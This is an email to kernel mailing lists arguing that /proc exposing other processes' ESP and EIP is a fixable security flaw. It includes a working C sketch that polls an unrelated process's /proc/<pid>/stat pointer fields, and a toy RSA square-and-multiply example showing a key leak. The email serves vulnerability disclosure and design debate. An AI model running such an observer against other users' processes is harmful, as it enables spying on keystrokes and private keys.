From: David Wagner <daw@cs.berkeley.edu>
To: rwatson@FreeBSD.org (Robert N. M. Watson)
Cc: freebsd-hackers@FreeBSD.org, linux-kernel@vger.kernel.org, Oliver Pinter
Date: Sun, 16 Aug 2009 17:58:36 -0700 (PDT)
Subject: Re: Security: information leaks in /proc enable keystroke recovery

I still think my definitions of "covert channel" vs "side channel" better reflect accepted usage these days, but whatever. I don't have any great desire to debate the definitions; that doesn't seem like a good use of everyone's time. I was trying to define some shorthand to make my point more concisely. Since my preferred shorthand turned out to be a barrier to communication rather than an aid, I'll try to make my point again, this time spelling it out without the problematic shorthand. I care more about the ultimate point than about the language we use to communicate it.

My broader point is this: I accept your argument that there is no point trying to defend against deliberate communication of information between two cooperating processes via some sneaky channel; there is no hope of stopping that in a general-purpose commodity OS. If processes X and Y are both colluding to send information from X to Y, they will succeed, no matter how hard we try. We have no hope of closing all such channels in general-purpose commodity OSes (like FreeBSD or Linux).

However, I do not accept that this argument means we should throw up our hands and ignore cases where the kernel allows a malicious process Y to spy on process X, against X's will. If the kernel has a leak that lets process Y eavesdrop on keystrokes typed into process X, that's arguably worth fixing; trying to prevent it is not clearly hopeless. There is a significant difference in threat model between "X and Y are both malicious and colluding with each other to facilitate some joint purpose shared by both" and "Y is malicious and is attempting to subvert the security of process X, against X's will".
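To make the mechanism concrete, here is a minimal sketch of the kind of observer involved. It assumes Linux and the /proc/<pid>/stat layout documented in proc(5), where fields 29 and 30 are kstkesp and kstkeip; it is illustrative only, not the code from the paper. Note that it needs no cooperation from X at all, only read access to a world-readable file:

    /*
     * Minimal sketch (assumptions: Linux, and the /proc/<pid>/stat layout
     * documented in proc(5), where fields 29 and 30 are kstkesp and
     * kstkeip).  Y samples X's kernel stack pointer and instruction
     * pointer in a loop; this is the raw observation the keystroke-
     * recovery attack builds on.  If the kernel restricts these fields,
     * they simply read back as zero.
     */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    int main(int argc, char **argv)
    {
        if (argc != 2) {
            fprintf(stderr, "usage: %s <pid>\n", argv[0]);
            return 1;
        }
        char path[64];
        snprintf(path, sizeof(path), "/proc/%s/stat", argv[1]);

        for (;;) {
            FILE *f = fopen(path, "r");
            if (f == NULL)
                break;                          /* target exited or unreadable */
            char buf[4096];
            if (fgets(buf, sizeof(buf), f) == NULL) {
                fclose(f);
                break;
            }
            fclose(f);

            /* comm (field 2) may contain spaces; skip past its closing ')' */
            char *p = strrchr(buf, ')');
            if (p == NULL || p[1] == '\0')
                break;
            p += 2;                             /* now at field 3 */

            unsigned long esp = 0, eip = 0;
            int field = 3;
            for (char *tok = strtok(p, " "); tok != NULL;
                 tok = strtok(NULL, " "), field++) {
                if (field == 29)
                    esp = strtoul(tok, NULL, 10);   /* kstkesp */
                else if (field == 30) {
                    eip = strtoul(tok, NULL, 10);   /* kstkeip */
                    break;
                }
            }
            printf("esp=%#lx eip=%#lx\n", esp, eip);
            usleep(1000);                       /* sample at roughly 1 kHz */
        }
        return 0;
    }

The point of the sketch is that Y is just polling a file it can already open; X has no way to opt out, which is what makes this a different problem from two colluding processes.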
If the designers deliberately intended to allow process Y to snoop on the ESP and EIP of process X, even when there is no relationship between X and Y (e.g., they don't share a uid, and Y isn't root), well, I would claim that was a design error. Facilitating keystroke recovery does not seem like a good design goal.

The impact could also be broader than what is discussed in the Usenix Security paper. Imagine that process X is doing crypto, say an RSA decryption, and a malicious process Y is running on the same machine. If Y is allowed to observe X's EIP, then Y may be able to observe which path X has taken through the code. In some cases, such as a naive implementation of RSA decryption, that may reveal X's private key. Leaking EIP and ESP to every other user on the same system strikes me as pretty dubious.
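To spell out the crypto concern, here is a toy sketch (purely hypothetical, not drawn from any real library) of textbook left-to-right square-and-multiply modular exponentiation. The multiply step runs only for 1-bits of the exponent, so an observer who can tell which code path the process is executing, for example by sampling its EIP, can read the exponent (in RSA, the private decryption exponent) off bit by bit:

    /*
     * Toy sketch of naive square-and-multiply modular exponentiation.
     * The branch taken in each iteration depends directly on one bit of
     * the exponent, so the sequence of code paths reveals the exponent.
     */
    #include <stdint.h>
    #include <stdio.h>

    static uint64_t modexp_naive(uint64_t base, uint64_t exp, uint64_t mod)
    {
        uint64_t result = 1 % mod;
        for (int i = 63; i >= 0; i--) {
            result = (result * result) % mod;   /* square: every iteration */
            if ((exp >> i) & 1)
                result = (result * base) % mod; /* multiply: only for 1-bits */
        }
        return result;
    }

    int main(void)
    {
        /* toy operands only; real RSA uses multi-precision integers */
        uint64_t secret_exponent = 0xB105F00Dull;   /* stands in for d */
        printf("%llu\n", (unsigned long long)
               modexp_naive(42, secret_exponent, 1000003));
        return 0;
    }

Careful implementations defend against this with constant-time exponentiation and blinding, but the example shows why letting arbitrary users sample another process's EIP is more than a theoretical worry.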